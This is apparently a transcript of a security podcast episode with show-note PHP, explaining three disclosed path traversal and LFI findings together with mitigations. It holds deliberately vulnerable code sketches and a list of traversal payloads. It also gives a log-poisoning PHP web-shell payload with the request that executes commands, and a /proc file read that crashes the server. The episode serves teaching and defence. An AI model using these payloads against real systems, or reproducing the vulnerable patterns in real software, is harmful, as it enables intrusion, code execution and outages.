Hacked & Secured: Pentest Exploits & Mitigations

Ep. 9 – Directory Traversal & LFI: From File Leaks to Full Server Crash

Amin Malekpour Season 1 Episode 9

One markdown link copied server files. One poisoned log triggered remote code execution. One LFI crashed the entire server.
In this episode, we unpack three real-world exploits—directory traversal and local file inclusion flaws that went far beyond file reads. From silent data leaks to full server compromise, these attacks all started with a single trusted path.

Chapters:

00:00 - INTRO

01:07 - FINDING #1 - Server File Theft with Directory Traversal

09:23 - FINDING #2 - From File Inclusion to RCE via Log Poisoning

16:20 - FINDING #3 - LFI to Server Crash

24:09 - OUTRO

Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!

🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email us at podcast@quailu.com.au
🔗 Podcast Website → Website Link

INTRO 

What if just moving a ticket between projects gave you access to files buried deep in the server, like config files or private keys?

What if a single log entry—written automatically by the system—could be weaponised to execute remote commands?

And what if all it took to crash a production server… was loading the wrong file?

I’m Amin Malekpour, and you are listening to Hacked & Secured: Pentest Exploits & Mitigations.

In today’s episode, we’re unpacking three path traversal and LFI vulnerabilities that prove just how dangerous file access bugs can be.

Sometimes, you don’t need a shell to cause real damage. You just need to know which file to target and how to trick the application into loading it.

FINDING #1 - Server File Theft with Directory Traversal

You move a ticket from one project to another. Just a normal admin task, right? A simple way to stay organised, clean up your board, and keep things tidy.

But what if that move did something more?

What if, behind the scenes, it quietly copied a file you were never meant to see—like a server config file, or even a private SSH key?

And all of it happened because of how the system handled markdown links inside the issue.

That’s exactly what Vakzz discovered and reported on HackerOne—a directory traversal vulnerability that let attackers copy any file they wanted from the backend server, just by sneaking in a tricky file path inside a markdown link.

Before we go any deeper into this first finding, let’s take a moment to talk about the type of vulnerabilities we’re dealing with in this episode. All three findings share the same root issue—they’re either path traversal or local file inclusion. So if those terms sound unfamiliar to you, here’s a quick explanation.

Let’s start with path traversal, also known as directory traversal. This happens when an app lets you give it a file path, like “Tell me which document to open”, but it doesn’t properly check where that path actually leads. So an attacker changes the input to something like “dot dot slash, dot dot slash, etc slash passwd,” and suddenly they’re reading sensitive files buried deep in the server.

Here’s a simple way to think about it:

You work in an office. Every department has its own locked cabinet. If you ask the assistant for your payslip, they grab it from the HR drawer. But what if you sneakily change the folder name and say, “Actually, get me something from HR/confidential.” And the assistant, without checking, just hands it over. That’s path traversal. The system trusts what you asked for and never checks where it really goes.
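
If you’re reading along in the show notes, here’s what that looks like in code. This is a minimal PHP sketch of the vulnerable pattern, purely illustrative and not taken from any of the findings in this episode:

  <?php
  // Minimal illustration of path traversal: the app means to serve documents
  // from one folder, but glues user input onto the path without checking it.
  $baseDir  = '/var/www/app/documents/';
  $fileName = $_GET['doc'];            // attacker sends: ../../../../etc/passwd

  // The "../" sequences walk straight out of the documents folder,
  // so this ends up reading /etc/passwd instead of a document.
  readfile($baseDir . $fileName);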

Now, LFI—or Local File Inclusion—takes it a step further. It’s like path traversal, but instead of just reading the file, the app actually loads it into the page or runs it as part of the code. So if you point it to something like a system file or config file, it might show that content or worse, process it in the backend.

Imagine giving the app a file path like “dot dot slash dot dot slash etc slash passwd.”
 And instead of blocking it, the app says, “No problem,” and includes that file right into the page it’s building.

At that point, you’re not just viewing a file.
 You’re making the app pull that file into itself—as if it were part of the app’s own content.
 And sometimes? That’s all it takes for things to go very wrong.

With path traversal, you’re just looking into places you shouldn’t look.
 But with LFI? You’re actually dragging those files into the app itself, and making the app handle them like they belong there.
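
In code, the difference often comes down to a single function call. Here’s another hypothetical PHP sketch, this time of the LFI variant, where the file is included rather than just read:

  <?php
  // Local File Inclusion: the same unchecked input, but now the target is
  // included. include() treats the file as PHP source, so plain text is
  // echoed into the page and any embedded PHP code inside it gets executed.
  $page = $_GET['page'];               // attacker sends: ../../../../etc/passwd
  include('pages/' . $page);           // the app pulls the file into itself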

The Discovery: A Markdown Pattern That Was Too Trusting

Alright, let’s get back to the story.

Vakzz was looking into how the platform handled file uploads inside issue descriptions—especially the markdown links that get added when you attach a file.

Normally, these links just point to safe stuff—like images, PDFs, or screenshots stored by the app.

But something caught his eye.
 Each markdown link had a pattern: it included a secret-looking string and the actual file name.
 And that file name? It wasn’t being cleaned or checked properly.

So he had an idea—what if he changed the file name to a path that goes outside the uploads folder?
 Something like “dot dot slash dot dot slash etc slash passwd”?

Now, instead of linking to a normal file, the markdown points to a real file on the server’s system.

But here’s the clever part.
 The real magic happened when Vakzz moved the issue to another project. Why? Because when you move an issue, the platform tries to bring all related files with it, including anything mentioned in the markdown.

So the server saw the link, followed the path, and quietly pulled that sensitive file into the new project—thinking it was just part of the original issue.

That’s when a small markdown trick turned into full file access.

Here’s how it happened.

Vakzz created two projects. In the first one, he opened a new issue and added a markdown link. It looked totally normal—just a link to a file.

But the link was special. It didn’t point to a normal file like an image or a PDF. Instead, it used a sneaky path like “dot dot slash dot dot slash etc slash passwd” to reach outside the uploads folder—into the server’s own system files.

He saved the issue. No error. Everything looked fine.

Then he moved that issue into the second project.

And this is where the backend kicked in. When you move an issue, the system also moves any files linked to it. But it didn’t check the file path. So instead of just moving a user upload, it followed the dangerous path and grabbed a file from deep inside the server.

The server then copied that system file into the new project’s uploads folder—treating it like a regular upload.

Now Vakzz had access to a sensitive file, pulled directly from the server, and it was sitting in his project like it belonged there.

This wasn’t just reading a file.
 This was getting the server to fetch it for him—through a trusted process.
 It wasn’t just a simple bug. It gave real access to files that were never meant to be shared.
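
To make the missing check concrete, here’s a hedged, hypothetical sketch of what a naive attachment-migration step can look like. The markdown format, function names, and regular expression are all assumptions made for illustration; this is not the platform’s actual code:

  <?php
  // Hypothetical "move issue" helper: it copies every file referenced in the
  // issue's markdown into the new project, trusting the referenced name as-is.
  function moveAttachments(string $markdown, string $oldUploads, string $newUploads): void
  {
      // Grab the file name from every upload link, e.g. /uploads/<secret>/<name>
      preg_match_all('#/uploads/[0-9a-f]+/([^)\s]+)\)#', $markdown, $matches);

      foreach ($matches[1] as $fileName) {
          // A name like "../../../../etc/passwd" escapes the uploads folder...
          $source = $oldUploads . '/' . $fileName;

          // ...and the server itself copies that sensitive file into the
          // attacker's new project as if it were a normal attachment.
          copy($source, $newUploads . '/' . basename($fileName));
      }
  }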

You might wonder—could this kind of attack still work today?
 The answer is yes. These kinds of vulnerabilities still exist.

Why?
 Because modern systems are made up of many moving parts.
 There’s markdown rendering, file handling, project migrations—all working together behind the scenes.
 And sometimes, one small piece assumes another part has already done the safety checks.

If just one step misses a validation—especially for something like a file path—that’s enough to open the door.
 And that’s where issues like this still manage to sneak in.

Here’s what went wrong:

  • The markdown system allowed raw file paths to be inserted.
  • Then, during issue migration, the platform tried to follow those paths—without checking where they actually pointed.
  • And there was no validation before copying the file into the new project.

So to everyone building or designing applications, here’s how you can prevent issues like this from slipping in:

  • Never trust file paths from user input. Always validate and sanitise them—every time (see the sketch after this list).
  • Set strict directory rules. Only allow access to specific, safe folders.
  • Double-check background operations. When moving issues or generating reports, make sure every file being touched is actually safe.
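
And here’s the sketch promised in that first point: one way to validate a user-supplied path before touching the file. It’s a minimal example that assumes a single fixed uploads folder; the function name and error handling are just illustrative:

  <?php
  // Resolve the requested path and refuse anything that escapes the uploads folder.
  function safeUploadPath(string $baseDir, string $userPath): string
  {
      $resolvedBase = realpath($baseDir);
      $resolvedPath = realpath($baseDir . '/' . $userPath);

      // realpath() collapses "../" sequences; if the result is missing or does
      // not stay under the uploads directory, do not touch the file at all.
      if ($resolvedBase === false
          || $resolvedPath === false
          || strpos($resolvedPath, $resolvedBase . DIRECTORY_SEPARATOR) !== 0) {
          throw new RuntimeException('Path escapes the uploads directory');
      }
      return $resolvedPath;
  }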

Bugs like this don’t usually show up during a login test or a regular form scan.
 They hide inside the quiet, automated features—where nobody’s looking.

Alright fellow pentesters, here’s how you can spot similar issues during your daily engagements:

  • If the app lets you reference files using IDs or paths—even in things like markdown, comments, or metadata—try injecting traversal sequences like dot dot slash (a few example variants follow this list). You’d be surprised how often these inputs aren’t properly sanitised, especially in places users don’t normally touch.
  • Look for background processes like issue migrations, file converters, or backups—anything that might automatically follow those file references.
  • And always ask yourself: “If I gave this system a malicious file path… would it actually go fetch it?”
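
Here are those example variants. They’re only illustrative strings; which one works, if any, depends entirely on how the target decodes and filters its input:

  <?php
  // Common traversal variants to try wherever an app accepts file names or paths.
  $payloads = [
      '../../../../etc/passwd',          // plain traversal
      '..%2f..%2f..%2fetc%2fpasswd',     // URL-encoded slashes, for apps that decode late
      '....//....//....//etc/passwd',    // doubled sequences, for naive "../" stripping
  ];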

Here’s the thing—directory traversal isn’t loud. It hides in plain sight, quietly blending into everyday workflows.
 If your platform copies files without checking where they came from, that’s not just a bug—it’s a blind spot. That’s exactly where the smartest attacks begin.

FINDING #2 - From File Inclusion to RCE via Log Poisoning

We started with a file path hidden inside markdown—one that let you copy sensitive files into your own project, just by moving an issue.

But what if I told you… the next attack didn’t need file uploads, and it didn’t rely on project transfers either?

What if all it needed… was a log file.
 One the server was already writing—automatically, in the background.

And with that?
 You go from simply reading files… to running commands.

This is exactly what Jerry Shah documented in a security write-up on Medium.com—a Local File Inclusion vulnerability, chained with log poisoning, that led to full Remote Code Execution.

Let’s break it down.

Jerry started with a classic Local File Inclusion bug.
 He found a parameter in the app that let him request local file paths—basically telling the server, “Hey, show me what’s inside this file.”

So he tested it with something common, like /etc/passwd—a file that lists all user accounts on the system.
 That one worked. He could read it.

Then he tried /etc/shadow, which stores the actual password hashes.
 But this time? Nothing came back. That’s no surprise: /etc/shadow is normally readable only by root, and the web server process almost never runs as root.

Most people would’ve stopped there. But Jerry didn’t.

Instead, he took a step back and asked himself:
 “What else could I try reading?”

He started thinking about log files—files that record different kinds of server activity.
 First, he tried accessing auth.log, which keeps a record of login attempts for services like SSH.
 Still nothing. No output.

But Jerry didn’t give up. He started looking for other clues.
 He ran an nmap scan on the target server to check for open ports—and that’s when he noticed something interesting: FTP was running.

Let’s put you in Jerry’s shoes for a second.
 You’ve got an LFI bug—but the usual files like /etc/shadow and even auth.log? They’re all blocked or empty.

You’re not getting anywhere.

But then you spot something: FTP is running on the server.

So let me ask you—what would you do next?
 Would you try anonymous login? Look for writable folders?
 Or—like Jerry—would you start thinking one step ahead?

He didn’t try to brute-force anything. Here’s what he did.

He knew that FTP has its own logging system. And by default, it writes to a file called vsftpd.log, usually stored in the /var/log folder. That gave him a new direction.

Because if the server was running FTP—and if logging was turned on—then maybe he could write his own payload into that log… and later include it using LFI.

And that’s exactly where things started to escalate.

He used the LFI parameter to request /var/log/vsftpd.log—and this time, it worked.
The server responded with the contents of the FTP log file.
That was the confirmation he needed.

Now, the next step was to poison that log file to sneak in some PHP code that would run when the file was included by the server.

So he did something clever.

He made a fake FTP login attempt, but instead of using a normal username, he used a PHP payload.
 The payload looked like this: <?php system($_GET["commandinjection"]); ?>

Spoken out loud: php, system, dollar underscore GET, with commandinjection as the parameter inside it.

That’s just PHP code that tells the server,
 “Run whatever command I send through the commandinjection parameter.”

He didn’t upload this code directly.
 He simply logged in to FTP using that code as his username.
 And because vsftpd logs everything—including usernames—that payload got saved right into the log file.

Then he went back to the LFI endpoint to check the vsftpd.log file, but this time he added a parameter at the end and requested:
 /var/log/vsftpd.log&commandinjection=ifconfig

And just like that, the server responded with the contents of the log file, and the output of the ifconfig command was sitting right there inside it.
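
Here’s the whole chain as a hedged sketch. The vulnerable parameter name and the exact vsftpd log format are assumptions; only the mechanism matters:

  <?php
  // Step 1, the poisoning: the attacker "logs in" over FTP with the PHP payload
  // as the username, so vsftpd records a log line roughly like this one:
  $poisonedLine = '[pid 123] FAIL LOGIN: Client "10.0.0.5", user "<?php system($_GET[\'commandinjection\']); ?>"';

  // Step 2, the inclusion: the vulnerable endpoint does something equivalent to
  //   include($_GET['file']);
  // and the attacker requests
  //   vulnerable.php?file=/var/log/vsftpd.log&commandinjection=ifconfig
  // include() treats the log as PHP source: the plain text is echoed back, but
  // the embedded payload is executed, so system() runs ifconfig on the server
  // and its output comes back mixed in with the rest of the log.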

He had remote code execution. Triggered from a log file. Using nothing more than a fake FTP login.

Put those two things together—file inclusion and log poisoning—and you’ve got full control.

At this point, the server isn’t just showing you files anymore…
 it’s running your code.
 And all it took was reading the right log file at the right time.

Here’s what went wrong:

  • The application had a Local File Inclusion vulnerability that let users read files from the server just by changing a parameter—no validation, no filters.
  • Through that LFI, attackers could access the FTP log file.
  • And worst of all? The server executed whatever was inside those files when they were included—without checking if the content was safe.

So to everyone building or designing applications, here’s how you can prevent something like this:

  • Never include files based on user input. If you absolutely must, limit it to a strict allowlist of safe file paths (see the sketch after this list).
  • Treat log files as sensitive. They may not be public, but if your app can include them—even indirectly—they become an attack surface.
  • Sanitize everything that goes into logs. Usernames, headers, anything the user controls. Never let raw input get logged in a way that could later be processed as code.
  • And anytime you’re dealing with dynamic file inclusion, ask yourself:
     “What happens if an attacker controls the content of that file?”
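
And here’s that allowlist sketch: user input never becomes a path, it only selects an entry from a fixed map. The page names and files are illustrative:

  <?php
  // User input only picks a key; the actual file paths are fixed by the developer.
  $pages = [
      'home'    => __DIR__ . '/pages/home.php',
      'profile' => __DIR__ . '/pages/profile.php',
      'help'    => __DIR__ . '/pages/help.php',
  ];

  $key = $_GET['page'] ?? 'home';
  if (!array_key_exists($key, $pages)) {
      http_response_code(404);
      exit;
  }
  include $pages[$key];   // only ever one of the files listed above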

Because here’s the truth:
 Letting someone read a file is bad…
 But letting them write into that file—and then get the server to run it?
 That’s a whole different story.

Alright, fellow pentesters—here are the key takeaways from this finding:

  • If you find an LFI, don’t stop at /etc/passwd. That’s just the surface. Think about what other files might be available—especially ones that update in real time.
  • Check for exposed logs. FTP logs, SSH logs, access logs—anything the system writes automatically. If you can read it, you might be able to poison it.
  • And always test chaining. On its own, LFI might seem low impact. But when you chain it with something like log poisoning? Suddenly, it’s Remote Code Execution.

When the app lets you decide which file to load—and what content goes into it...
that’s not just a bug.

That’s the system inviting you in and letting you run the show.

FINDING #3 - LFI to Server Crash

We started this episode with a file path hidden in markdown—one that let you move an issue and quietly pull sensitive files from the backend server.
 Then, we saw how an LFI technique—when paired with log poisoning—could escalate into full remote code execution.

But what if you couldn’t move issues… and you couldn’t run code either?

What if all you had was an LFI bug—and no access to secrets, no way to write to the system, and no way to get code execution?

Would you give up? Or would you pivot, shift your mindset… and use that same LFI to compromise the availability of the server?

This next finding was contributed to our podcast by one of our listeners. They asked to stay anonymous, and the technique they shared? It’s worth talking about.

This is a classic case of Local File Inclusion, but used in a way that compromised confidentiality and availability—even when integrity stayed untouched.

Let’s walk through it.

This one started during a black-box test. No access, no credentials—just a login page.

The login endpoint itself was solid. No brute-force, no injection. So the tester did what most good testers do—went back to Burp history to see what else the app was doing behind the scenes.

That’s when they spotted a request to an endpoint called “underscore assets.”

This endpoint was being used to load image files and JavaScript. But it accepted a file path—one that looked like it might be modifiable.

So they appended a path traversal sequence—dot dot slash repeated several times—and then added “etc/passwd.”

And when they hit the request?

The server returned the contents of the passwd file. Plaintext. No error. No restriction.

At this point, the LFI was fully confirmed.

 The tester could read any file that the server process had access to.
 So, like any good pentester, they started digging—looking for secrets.

They checked the usual stuff.
 /etc/passwd? Accessible.
 /etc/shadow? Blocked.
 Then came the search for SSH keys, API tokens, config files.
 But no luck.
 No active credentials. No database passwords.
 They even tried reading logs—nothing was exposed, and no log files were accessible. At most, they found a few expired tokens—leftovers from old sessions.
 But nothing they could use.

They ran an Nmap scan—just to see what doors were open. But the result? Only two ports: HTTP and SSH.
 No FTP, no database ports, nothing juicy.
 Just the basics.
 It looked like a dead end.
 No easy way in, and nothing obvious to abuse.

 So far… they had read access, but no way to modify anything.

At this point, many testers might’ve said:
 “Well, that’s it. Low-impact LFI. Nothing critical.”

But not this tester.

They paused—and started thinking like a real attacker.
 They asked themselves:
 “Okay… I can’t write. I can’t steal secrets. But can I break something?”

And that’s where mindset matters.
 Because they remembered: this wasn’t just a test app.
 This was a vendor platform—used by multiple clients across different regions.
 If you could knock it offline… even for a few minutes…
 That’s a critical finding.

So now, the focus shifted to availability.

What if there was a file on the system—some internal Linux file—that eats a lot of memory when it’s read?
 And what if the app wasn’t prepared to handle that?

They started researching:
 “Big files on Linux that can cause memory pressure when read via web apps…”

And that’s when they found something interesting: the /proc folder, and specifically the /proc/self/fd/6 file.
 It’s not a normal file. It’s a reference to one of the process’s own open file descriptors, and what it points to depends on how the server is set up.
 And in certain setups, reading that file pulls in a massive stream of data, which can crash the process due to memory exhaustion.
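
Here’s a minimal sketch of why that read can take the process down, and one way to cap the damage. The sizes are illustrative, and the cap only helps with availability; the path itself still needs the containment checks we covered earlier:

  <?php
  // The risky pattern: the whole target is slurped into memory before anything
  // is sent back, for example
  //
  //     echo file_get_contents($_GET['file']);
  //
  // If the path resolves to something that streams far more data than expected
  // (as some /proc file descriptors can, depending on what they point to),
  // the process can exhaust its memory and die.

  // A safer pattern never reads more than the app is prepared to serve.
  // (Path validation still applies; this only caps the read size.)
  $handle = fopen($_GET['file'], 'rb');
  if ($handle !== false) {
      echo stream_get_contents($handle, 1024 * 1024);   // hard 1 MB ceiling
      fclose($handle);
  }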

So they tried it.
 And just to be clear—this was all done in a test environment, not production.
 No real users were impacted. No customer data was ever at risk if the server went down.

They crafted the LFI payload to point to one specific file:
 /proc/self/fd/6

Sent the request…

And boom.

The app went down.
 No error message. No graceful failure.
 The server ran out of memory and crashed.
 A denial of service triggered by reading a single file.

Now think about that.
 No code execution. No password dumps.
 Just reading a large file in the wrong place—and it’s game over for the server.

This is what attacker mindset looks like.
 You don’t stop when you can’t escalate.
 You ask: “What else can I impact?”
Because even if integrity is safe, and confidentiality is limited…
availability is still on the table.

And in a multi-tenant vendor system, availability is everything.

So in the end?
One overlooked image loader…
One unchecked file path…
And the tester managed to take the app down completely.

Here’s where things broke down:

• The image loader was taking file paths from the user… without cleaning them up first.

• There were no checks to stop someone from escaping the safe folder using path traversal.

• And worst of all—there were no limits. No timeout, no file size check, nothing. The server just kept reading until it ran out of memory.

So to everyone building or designing applications—here’s how you can prevent something like this from happening:

• Sanitize and normalize every file path. Don’t trust raw input—make sure users can’t jump out of safe directories.

• Restrict access to only the folders your app is meant to serve from—especially if you’re serving static files or images.

• And set clear limits. Add timeouts, file size caps, memory ceilings—because sometimes, even a simple file read can bring your server to its knees.

Fellow pentesters, here’s how you can find issues like this in your own tests:

• If you see a file path—always test it with dot dot slash. Start simple: try known files like /etc/passwd and see how the app responds.
• If you don’t find secrets? Shift your goal. Maybe it’s not about access— it’s about breaking the system’s balance. Can you slow it down? Crash it?
• And don’t forget about unprotected asset endpoints. Things like image loaders or export tools—they often fly under the radar during security reviews.

You don’t need root access to make an impact.
If you can read something you shouldn’t—or take the whole app offline—that’s more than enough. But always remember—don’t run denial-of-service payloads in production.
Make sure you have clear permission from your manager or the client, and confirm that no real users or systems will be affected.

And one last thing…

So if you’re out there and you’ve found something interesting—even if it’s not a full-blown RCE or some crazy exploit chain—send it in.
 You don’t need to write a full blog post or tell the perfect story.
 Just drop the details. Tell us what happened: what you tried, what worked, what broke, while keeping the client details private.

We’ll take care of the rest and help share it with the community. Because someone out there is building a system right now—and your story might be the reason they catch a bug before it becomes a breach.

That’s why we do this. To learn from each other, and to raise the bar—one real-world exploit at a time. You can find the Google Form link for submissions in the description.

OUTRO

Every vulnerability we covered today had one thing in common—they all came down to trusting file paths.
Whether it was a markdown link, a log file, or a static asset—trusting the path gave attackers a way in. And every one of these bugs was responsibly disclosed. That’s what makes a real impact.

If this episode helped you learn something new, share it with someone who needs to hear it. Maybe it’s a developer, a pentester, or someone working in a security team. Because someone out there is building or designing something right now—and this might be the episode that helps them catch the bug before it matters. Let’s make cybersecurity knowledge accessible to all. See you in the next episode.

 


